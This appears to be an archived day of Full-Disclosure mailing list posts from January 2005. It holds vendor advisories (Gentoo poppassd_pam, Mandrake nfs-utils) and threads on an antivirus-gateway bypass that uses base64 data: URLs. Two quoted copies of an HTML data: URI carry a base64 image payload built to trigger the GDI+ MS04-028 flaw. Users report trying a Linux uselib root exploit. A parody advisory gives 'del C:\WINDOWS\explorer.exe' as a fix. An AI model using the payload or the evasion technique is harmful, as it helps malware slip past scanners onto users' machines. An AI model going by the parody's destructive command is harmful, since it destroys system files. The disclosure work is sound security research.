 Title: poppassd_pam: Unauthorized password changing
  Date: January 11, 2005
  Bugs: #75820
ID: 200501-22

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


poppassd_pam allows anyone to change any user's password without
authenticating the user first.

Background
==

poppassd_pam is a PAM-enabled server for changing system passwords that
can be used to change POP server passwords.

Affected packages
=

---
 Package /  Vulnerable  /   Unaffected
---
 net-mail/poppassd_ceti   <= 1.0  >= 1.8.4
 net-mail/poppassd_pam<= 1.0   Vulnerable!
---

Description
===

Gentoo Linux developer Marcus Hanwell discovered that poppassd_pam did
not check that the old password was valid before changing passwords.
Our investigation revealed that poppassd_pam did not call
pam_authenticate before calling pam_chauthtok.

Impact
==

A remote attacker could change the system password of any user,
including root. This leads to a complete compromise of the POP
accounts, and may also lead to a complete root compromise of the
affected server, if it also provides shell access authenticated using
system passwords.

Workaround
==

There is no known workaround at this time.

Resolution
==

All poppassd_pam users should migrate to the new package called
poppassd_ceti:

# emerge --sync
# emerge --ask --oneshot --verbose ">=net-mail/poppassd_ceti-1.8.4"

Note: Portage will automatically replace the poppassd_pam package by
the poppassd_ceti package.

References
==

  [ 1 ] CAN-2005-0002
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0002

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200501-22.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2005 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0



signature.asc
Description: OpenPGP digital signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

RE: [Full-Disclosure] Multi-vendor AV gateway image inspection bypassvulnerability

2005-01-11 Thread Mark Senior 
Trend Micro OfficeScan client (version 6.5, virus definitions from 10
Jan 2005) didn't catch it in my case.

I copied the html section from the original message straight to a text
file and scanned that.  I suppose it's possible some text wrapping
munged the original posting

Cheers
Mark


-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Danny
Sent: January 11, 2005 12:14
To: Darren Bounds
Cc: [EMAIL PROTECTED]; [EMAIL PROTECTED];
bugtraq@securityfocus.com; [EMAIL PROTECTED];
full-disclosure@lists.netsys.com
Subject: Re: [Full-Disclosure] Multi-vendor AV gateway image inspection
bypassvulnerability

On Mon, 10 Jan 2005 14:08:11 -0500, Darren Bounds
<[EMAIL PROTECTED]> wrote:
> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
> 
> Multi-vendor AV gateway image inspection bypass vulnerability January 
> 10, 2005
> 
> A vulnerability has been discovered which allows a remote attacker to 
> bypass anti-virus (as well other security technologies such as IDS and

> IPS) inspection of HTTP image content.
> 
> By leveraging techniques described in RFC 2397 for base64 encoding 
> image content within the URL scheme. A remote attack may encode a 
> malicious image within the body of an HTML formatted document to 
> circumvent content inspection.
> 
> For example:
> 
> http://www.k-otik.com/exploits/09222004.ms04-28-cmd.c.php
> 
> The source code at the URL above will by default create a JPEG image 
> that will attempt (and fail without tweaking) to exploit the Microsoft

> MS04-028 GDI+ vulnerability.
> The image itself is detected
> by all AV gateway engines tested (Trend, Sophos and McAfee), however, 
> when the same image is base64 encoded using the technique described in

> RFC 2397 (documented below), inspection is not performed and is 
> delivered rendered by the client.
> 
> While Microsoft Internet Explorer does not support the RFC 2397 URL 
> scheme; Firefox, Safari, Mozilla and Opera do and will render the data

> and thus successfully execute the payload if the necessary OS and/or 
> application patches have not been applied.
> 
> ## BEGIN HTML ##
> 
> 
> 
>  src="data:image/gif;base64,/9j/4AAQSkZJRgABAQEAYABgAAD//
> gAARXhpZgAASUkqAAgAHPD9f0FBQUGWAgAAGgAAABzw
> /X9BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
> FB 
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
> FB 
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
> FB 
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
> FB 
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
> FB 
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
> FB 
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
> FB 
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
> FB 
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
> FB 
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
> FB 
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
> FB 
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
> FB 
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
> FB 
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
> FB 
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
> FB 
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
> FB 
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
> FB 
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
> FB 
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQQAAAP/bAEMACAYGBwYFCAcHBw
> kJ 
> CAoMFA0MCwsMGRITDxQdGh8eHRocHCAkLicgIiwjHBwoNyksMDE0NDQfJzk9ODI8LjM0Mv
> /b 
> AEMBCQkJDAsMGA0NGDIhHCEyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj
> Iy 
> MjIyMjIyMjIyMjIyMv/AABEIAAMAAwMBIgACEQEDEQH/xAAfAAABBQEBAQEBAQ
> AA 
> AQIDBAUGBwgJCgv/xAC1EAACAQMDAgQDBQUEBX0BAgMABBEFEiExQQYTUWEHInEUMo
> GR 
> oQgjQrHBFVLR8CQzYnKCCQoWFxgZGiUmJygpKjQ1Njc4OTpDREVGR0hJSlNUVVZXWFlaY2
> Rl 
> ZmdoaWpzdHV2d3h5eoOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExc
> bH
> yMnK0tPU1dbX2Nna4eLj5OXm5+jp6vHy8/T19vf4+fr/xAAfAQADAQEBAQEBAQEBAA
> yMnK0tPU1dbX2Nna4eLj5OXm5+AA
> AQIDBAUGBwgJCgv/xAC1EQACAQIEBAMEBwUEBAABAncAAQIDEQQFITEGEkFRB2FxEyIygQ
> gU 
> QpGhscEJIzNS8BVictEKFiQ04SXxFxgZGiYnKCkqNTY3ODk6Q0RFRkdISUpTVFVWV1hZWm
> Nk 
> ZWZnaGlqc3R1dnd4eXqCg4SFhoeIiYqSk5SVlpeYmZqio6Slpqeoqaqys7S1tre4ubrCw8
> TF
> xsfIycrS09TV1tfY2dri4+Tl5ufo6ery8/T19vf4+fr/2gAMAwEAAhEDEQA/APn+iiigD/
> xsfIycrS09TV1tfY2dri4+/
> Z">
> 
> 
> 
> ## END HTML ##
> 
> Solution:
> 
> While AV vendor patches are not yet available, fixes for all currently

> known image vulnerabilities are and have been for several months.  If 
> you have not yet applied them, you have your own negligence to blame.
> 
> Contributions:
> 
> Thanks to Scott Roeder and Jacinto Rodriquez their as

[Full-Disclosure] Re: Firespoofing [Firefox 1.0]

2005-01-11 Thread Pavel Kankovsky 
On Tue, 11 Jan 2005, mikx wrote:

> The bug is confirmed but currently unfixed (open for more than 3 months). As 
> a partial workaround set dom.disable_window_flip to true in about:config. 

Setting most of dom.disable_window_open_feature.* to true (and making it
impossible to remove browser "decorations" from browser windows) is a
pretty efficient (even if not 100% bullet-proof) way to thwart this kind
of attack. As well as other GUI spoofing attacks.

--Pavel Kankovsky aka Peak  [ Boycott Microsoft--http://www.vcnet.com/bms ]
"Resistance is futile. Open your source code and prepare for assimilation."

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

RE: [Full-Disclosure] FW: New Security Patches from Microsoft

2005-01-11 Thread Todd Towles 
 Agreed, I spoke a bit too fast. Peter Kruse e-mail me directly and
stated the same. Thanks for pointing that out.

> -Original Message-
> From: Larry Seltzer [mailto:[EMAIL PROTECTED] 
> Sent: Tuesday, January 11, 2005 2:04 PM
> To: Todd Towles; 'Mailing List - Full-Disclosure'
> Subject: RE: [Full-Disclosure] FW: New Security Patches from Microsoft
> 
> >>No IE patch, it would seem.
> 
> No, but...
> 
> > MS05-001 (Critical)Vulnerability in the Indexing Service 
> Could Allow 
> > Remote Code Execution (871250) Vulnerability in HTML Help 
> Could Allow 
> > Code Execution (890175) 
> > http://www.microsoft.com/technet/security/Bulletin/MS05-001.mspx
> > 
> > MS05-002 (Critical)
> > Vulnerability in Cursor and Icon Format Handling Could Allow Remote 
> > Code Execution (891711) 
> > http://www.microsoft.com/technet/security/Bulletin/MS05-002.mspx
> > 
> 
> Both of these address problems that have been exploited through IE.
> These are the ones that have gotten so much recent publicity.
> 
> 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Microsoft AntiSpyware: Will it be free and Vulnerable

2005-01-11 Thread devis 
Dan Margolis wrote:
On Tue, Jan 11, 2005 at 06:51:16PM +0100, devis wrote:
 

Buahwuahwuahwuawa ... you have to be gullible to think that M$ will not 
NOT cash on their own slack coding.  
   

I'm confused. Are are you saying that "slack coding" by Microsoft is
responsible for spyware/adware? Seems a bit of an odd interpretation.
Here's mine:
- It's very, very difficult to prevent people from voluntarily
 installing spyware on their own systems. There's no way to write a
 heuristic that can distinguish between an application that accesses
 the 'net on a regular basis for spying and one that does so for, say,
 monitoring a buddy list or checking for mail. 

- You can certainly whitelist applications, but this would prevent
 useres from being able to install obscure shareware apps, custom apps,
 etc. 

- Were MS to restrict access to their API in order to prevent spyware
 makers from doing obscure tricks with the registry and whatnot, they'd
 be accused, quite rightly, of anti-competitive tactics. 

Certainly some spyware results from poor restriction of web controls or
something--I don't know the details, as I don't even use Windows--but
I'd bet you the vast majority comes from users installing stuff they
shouldn't--Kazaa, Snood, whatever--or from users clicking "OK" on banner
ads that promise to speed your Internet connection. 

Much of the same goes for e-mail worms: so long as a user has permission
to execute untrusted code and so long as that user has permission to
send code to other people, he is easy prey for e-mail born worms. 

So, here's the question: does most spyware exploit some actual bug or
design flaw? Or does it just use the user's gullibility? I suspect the
latter. 

Flame on. 
--
Dan
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
 

It is prooved matter that spywares do exploits IE holes ( Iframes bugs, 
Active X etc etc ). Do your work on a few and you will see. Beside, you 
missed the point entirely: if an user, just by clicking, can install 
spyware on his machine, then the OS / browser is to blame, not the 
actual (bad) code (exploiting it) floating around websites.
Once again, you are missing the point completely, if M$ didn't 'slack 
code' their OS, spyware would :
1) not install
2) therefore not exist in the form, numbers and variety we know them

I'll give you a clue:
try to get a 'tool bar' or some 'other added bonus' automagically on 
bsd/unix/linux/solaris using any browser, on any site, clicking randomly.
As you said,
'It's very, very difficult to prevent people from voluntarily installing 
spyware on their own systems.' yes indeed, because MS made it that the 
average joe is an admin therefore has supreme powers out of the box.
Usability costs security. Always has, always will.

No Flames, Just information.
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Re: I thought Microsoft were releasing new security patches today (11 Jan 2005)?

2005-01-11 Thread steve menard 
Matt Ostiguy wrote:
On Tue, 11 Jan 2005 15:13:45 -, Mike Diack <[EMAIL PROTECTED]> wrote:
 

Where are they?
Mike
   

My experience has been that the 2nd tuesday of the month patch drop
occurs late in the day or evening, Eastern Standard Time.
Matt
 

I just got 3 for windows 2000 server
through Auto updates not there last week  ;-0
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Linux kernel uselib() privilege elevation, corrected

2005-01-11 Thread steve menard 
Gaz Wilson wrote:
On Tue, 11 Jan 2005, Athanasius wrote:
 

On Tue, Jan 11, 2005 at 07:56:32AM +, Marcy Darcy wrote:
   

I'm running a small server with the 2.6.10 kernel.
The exploit doesen't seem to be working on this kernel. Is there a way
to make sure the sistem is vulnerable or not?
 

 I couldn't get the exploit to work for 2.6.10 either.  First there's
changing a struct in it to user_desc to make it compile, then it just
SEGVs all the time here.
   

I get it compiled and running on 2.6.8, but it doesn't do anything, other
than hog all available CPU for about 10-15 minutes followed by:
[-] FAILED: try again (-f switch) and again (Cannot allocate memory)
Killed
The same thing happens with the -f switch, except the process gets stopped
(SIGSTOP) instead of killed after the alloted time.
 

My RedHat 8.0  system won't give up id 0
although I do have a semi-permanent DOS on my hands right now with
./exploit -n5
;-)since 4 hours ago   ;-{
I expect I just don't have thew commandline correct
Although it may [doubtful] be Bastille settings
steve
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Using data: URLs for malware injection

2005-01-11 Thread Michael Holzt 

Using data: URL for malware injection

2005/01/11, Michael Holzt, kju -at- fqdn.org
based on work done by Darren Bounds (see text)



As described by Darren Bounds in an earlier posting [1], RFC2397 allows to
embed data into an HTML formatted document. While Darren only used this for
malicious images, i made some further research which shows that this can
also be used to embed an executable file into the document. As shown by
Darren, such embedded data is not detected by current AV gateways. This
could be abused by websites (and probably HTML email too) for distributing 
malware.

The attack works by using an URL scheme like this:

   data:application/x-msdos-program;base64,
 [base64 data]">Click me!

I've made an example available which embeds putty.exe. The example is about
500 kByte HTML and is available on http://kju.de/misc/putty.html. Please do
not spread this URL outside of this list because of the traffic. Feel free
to copy the example to your own webspace.

My tests with various windows based webbrowsers had the following results:

  - IE6 clicking on the link does nothing

  - Mozilla 1.5.4   will try to open the "what should i do with that" 
file dialog and then hangs. needs to get killed.

  - Firefox 1.0 allows saving of the data to harddisk
(on linux it will also display much rubbish
in the save dialog)

  - Opera 7.5.4 tells that it will open the file with notepad
(which sounds ok), but will then EXECUTE IT
INSTEAD (without further warning).

The behaviour of Opera 7.5.4 seems like a major security bug to me. Can
someone else confirm this behaviour?


References:

[1] Posting by Darren Bounds on 2005/01/10,
<[EMAIL PROTECTED]> 
http://lists.netsys.com/pipermail/full-disclosure/2005-January/030724.html
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] MORE CRITICAL FLAWS IN MS WINDOWS EXPLORER

2005-01-11 Thread Team Pwnge 
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
TEAM PWN4GE Security Advisory PWNED
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: HIGH
 Title: EXPLORER: Vulnerability in all versions of Windows Explorer
  Date: January 11, 2005

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


Multiple overflows have been found in Windows Explorer, potentially
allowing a remote user to open Explorer and run files remotely.


Background
==

Windows Explorer is an advanced browsing tool made by Microsoft. It
is used in daily tasks to open folders, copy files, delete files, rename
files and view files on a system. It is the foundation of the World Wide
Web and used by billions worldwide. It runs on an array of machines.


Affected versions
=

All versions of Windows' Explorer are vulnerable

Description
===

Shogun Suzuki discovered that a remote user can connect to any
machine via numerous exploits and use Windows Explorer to view files,
rename files, delete files, change permissions on files stored on a
remote machine that has been pwned.

Impact
==

A remote attacker could install something similar to PCAnywhere
after exploiting Windows and use Windows' Explorer to view, copy
and or open any file on a victims machine.

Workaround
==

On a command prompt: del C:\WINDOWS\explorer.exe


Concerns?
=

Security is a primary focus of TEAM PWN4GE and ensuring the
progress of secure Windows machines be our dreams. As security
concerns should be addressed to respective vendors, we feel the
urge to bypass standards and bring our common dreams of a
secure homeland to the Interweb.

License
===

Copyright 2005 TEAM PWN4GE

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0
-- 
___
Outgun.com free e-mail @ www.outgun.com 
Check out our Premium services - POP3 downloading, e-mail forwarding, and 25MB 
mailboxes!

Powered by Outblaze

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] MDKSA-2005:005 - Updated nfs-utils packages fix 64bit vulnerability

2005-01-11 Thread Mandrake Linux Security Team 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandrakelinux Security Update Advisory
 ___

 Package name:   nfs-utils
 Advisory ID:MDKSA-2005:005
 Date:   January 11th, 2005

 Affected versions:  10.0, 10.1, 9.2, Corporate Server 2.1
 __

 Problem Description:

 Arjan van de Ven discovered a buffer overflow in rquotad on 64bit
 architectures; an improper integer conversion could lead to a
 buffer overflow.  An attacker with access to an NFS share could send a
 specially crafted request which could then lead to the execution of
 arbitrary code.
 
 The updated packages are provided to prevent this issue.
 ___

 References:

  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0946
 __

 Updated Packages:
  
 Mandrakelinux 10.0:
 71991bf34674e4bebd4870c24dce4929  10.0/RPMS/nfs-utils-1.0.6-2.2.100mdk.i586.rpm
 1c6231362def3c56d747b3ccc22b7597  
10.0/RPMS/nfs-utils-clients-1.0.6-2.2.100mdk.i586.rpm
 bf52589c8d97f63f3024f90a79c201c9  10.0/SRPMS/nfs-utils-1.0.6-2.2.100mdk.src.rpm

 Mandrakelinux 10.0/AMD64:
 28bc6309e5488cd7bf294ae1a4ce68b2  
amd64/10.0/RPMS/nfs-utils-1.0.6-2.2.100mdk.amd64.rpm
 ed8b7dfa77200e5badb473678a91bb2a  
amd64/10.0/RPMS/nfs-utils-clients-1.0.6-2.2.100mdk.amd64.rpm
 bf52589c8d97f63f3024f90a79c201c9  
amd64/10.0/SRPMS/nfs-utils-1.0.6-2.2.100mdk.src.rpm

 Mandrakelinux 10.1:
 bb7161793b2154c3e122adabaed9ed60  10.1/RPMS/nfs-utils-1.0.6-2.2.101mdk.i586.rpm
 e219e85405758a9ef9511eacf4118e07  
10.1/RPMS/nfs-utils-clients-1.0.6-2.2.101mdk.i586.rpm
 7510d378225740169ae1a3dbaf0f223f  10.1/SRPMS/nfs-utils-1.0.6-2.2.101mdk.src.rpm

 Mandrakelinux 10.1/X86_64:
 ed70043e2d95cbebc2cd12e0f973a29f  
x86_64/10.1/RPMS/nfs-utils-1.0.6-2.2.101mdk.x86_64.rpm
 7c086dfb028423e910552594aff5  
x86_64/10.1/RPMS/nfs-utils-clients-1.0.6-2.2.101mdk.x86_64.rpm
 7510d378225740169ae1a3dbaf0f223f  
x86_64/10.1/SRPMS/nfs-utils-1.0.6-2.2.101mdk.src.rpm

 Corporate Server 2.1:
 cc1b1f4c8232db49f40df9117d2237f8  
corporate/2.1/RPMS/nfs-utils-1.0.1-1.3.C21mdk.i586.rpm
 8af58044e57d46921c0ad8745826d1dd  
corporate/2.1/RPMS/nfs-utils-clients-1.0.1-1.3.C21mdk.i586.rpm
 9d167452a31fc1e5ef4f43086f0d7b34  
corporate/2.1/SRPMS/nfs-utils-1.0.1-1.3.C21mdk.src.rpm

 Corporate Server 2.1/x86_64:
 c7f8d994d4d261d41f6bf246c280fb10  
x86_64/corporate/2.1/RPMS/nfs-utils-1.0.1-1.3.C21mdk.x86_64.rpm
 77be17723eb840715500edb3cf8c687b  
x86_64/corporate/2.1/RPMS/nfs-utils-clients-1.0.1-1.3.C21mdk.x86_64.rpm
 9d167452a31fc1e5ef4f43086f0d7b34  
x86_64/corporate/2.1/SRPMS/nfs-utils-1.0.1-1.3.C21mdk.src.rpm

 Mandrakelinux 9.2:
 00f2319415647d9fa85926cc05271793  9.2/RPMS/nfs-utils-1.0.5-1.2.92mdk.i586.rpm
 680ef7be663350d18ad5b7f94bbc2e21  
9.2/RPMS/nfs-utils-clients-1.0.5-1.2.92mdk.i586.rpm
 4a49c7508d166c62b6d76e7c1cccbacd  9.2/SRPMS/nfs-utils-1.0.5-1.2.92mdk.src.rpm

 Mandrakelinux 9.2/AMD64:
 c0e275ce5838575eda14efb2d582aefc  
amd64/9.2/RPMS/nfs-utils-1.0.5-1.2.92mdk.amd64.rpm
 779856f22f146342ab6e42c4f20acd95  
amd64/9.2/RPMS/nfs-utils-clients-1.0.5-1.2.92mdk.amd64.rpm
 4a49c7508d166c62b6d76e7c1cccbacd  
amd64/9.2/SRPMS/nfs-utils-1.0.5-1.2.92mdk.src.rpm
 ___

 To upgrade automatically use MandrakeUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandrakesoft for security.  You can obtain
 the GPG public key of the Mandrakelinux Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandrakelinux at:

  http://www.mandrakesoft.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_linux-mandrake.com

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Linux Mandrake Security Team
  
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFB5F0emqjQ0CJFipgRAg3wAKDBYs/rXJUwddiDT27a+ij2yMOS7QCfY11g
cDdxBS2vNnkYW79o+n63YRk=
=ggoY
-END PGP SIGNATURE-
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Multi-vendor AV gateway image inspection bypass vulnerability

2005-01-11 Thread Darren Bounds 
Hello Danny,
This vulnerability is only applicable to the HTTP data while in  
transit. Once received by the client the image will be rendered and  
subsequently detected if local AV software.

At the present time, I'm not aware of any AV, IDS or IPS vendor that  
will detect malicious images imbedded in HTML in this manner.

Thank you,
Darren Bounds
Intrusense, LLC.
--
Intrusense - Securing Business As Usual

On Jan 11, 2005, at 2:14 PM, Danny wrote:
On Mon, 10 Jan 2005 14:08:11 -0500, Darren Bounds
<[EMAIL PROTECTED]> wrote:
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Multi-vendor AV gateway image inspection bypass vulnerability
January 10, 2005
A vulnerability has been discovered which allows a remote attacker to
bypass anti-virus
(as well other security technologies such as IDS and IPS) inspection  
of
HTTP image content.

By leveraging techniques described in RFC 2397 for base64 encoding
image content within
the URL scheme. A remote attack may encode a malicious image within  
the
body of an HTML
formatted document to circumvent content inspection.

For example:
http://www.k-otik.com/exploits/09222004.ms04-28-cmd.c.php
The source code at the URL above will by default create a JPEG image
that will attempt (and fail
without tweaking) to exploit the Microsoft MS04-028 GDI+  
vulnerability.
The image itself is detected
by all AV gateway engines tested (Trend, Sophos and McAfee), however,
when the same image
is base64 encoded using the technique described in RFC 2397  
(documented
below), inspection
is not performed and is delivered rendered by the client.

While Microsoft Internet Explorer does not support the RFC 2397 URL
scheme; Firefox, Safari,
Mozilla and Opera do and will render the data and thus successfully
execute the payload if the necessary
OS and/or application patches have not been applied.
## BEGIN HTML ##



src="data:image/gif;base64,/9j/4AAQSkZJRgABAQEAYABgAAD//
gAARXhpZgAASUkqAAgAHPD9f0FBQUGWAgAAGgAAABzw
/ 
X9BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF 
B
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU 
FB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU 
FB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU 
FB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU 
FB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU 
FB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU 
FB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU 
FB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU 
FB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU 
FB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU 
FB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU 
FB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU 
FB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU 
FB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU 
FB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU 
FB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU 
FB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU 
FB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQQAAAP/ 
bAEMACAYGBwYFCAcHBwkJ
CAoMFA0MCwsMGRITDxQdGh8eHRocHCAkLicgIiwjHBwoNyksMDE0NDQfJzk9ODI8LjM0Mv 
/b
AEMBCQkJDAsMGA0NGDIhHCEyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj 
Iy
MjIyMjIyMjIyMjIyMv/AABEIAAMAAwMBIgACEQEDEQH/ 
xAAfAAABBQEBAQEBAQAA
AQIDBAUGBwgJCgv/ 
xAC1EAACAQMDAgQDBQUEBX0BAgMABBEFEiExQQYTUWEHInEUMoGR
oQgjQrHBFVLR8CQzYnKCCQoWFxgZGiUmJygpKjQ1Njc4OTpDREVGR0hJSlNUVVZXWFlaY2 
Rl
ZmdoaWpzdHV2d3h5eoOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExc 
bH
yMnK0tPU1dbX2Nna4eLj5OXm5+jp6vHy8/T19vf4+fr/ 
xAAfAQADAQEBAQEBAQEB
AQIDBAUGBwgJCgv/ 
xAC1EQACAQIEBAMEBwUEBAABAncAAQIDEQQFITEGEkFRB2FxEyIygQgU
QpGhscEJIzNS8BVictEKFiQ04SXxFxgZGiYnKCkqNTY3ODk6Q0RFRkdISUpTVFVWV1hZWm 
Nk
ZWZnaGlqc3R1dnd4eXqCg4SFhoeIiYqSk5SVlpeYmZqio6Slpqeoqaqys7S1tre4ubrCw8 
TF
xsfIycrS09TV1tfY2dri4+Tl5ufo6ery8/T19vf4+fr/2gAMAwEAAhEDEQA/ 
APn+iiigD//
Z">



## END HTML ##
Solution:
While AV vendor patches are not yet available, fixes for all currently
known image vulnerabilities are
and have been for several months.  If you have not yet applied them,
you have your own
negligence to blame.
Contributions:
Thanks to Scott Roeder and Jacinto Rodriquez their assistance in
platform testing.
I believe TrendMicro's OfficeScan (client-server scanner) will catch
it, but I am not sure about their gateway device. What was their
response?
...D
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] MORE CRITICAL FLAWS IN MS WINDOWS EXPLORER

2005-01-11 Thread vh 
On Wed, 12 Jan 2005 06:52:04 +0800
"Team Pwnge" <[EMAIL PROTECTED]> wrote:

> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
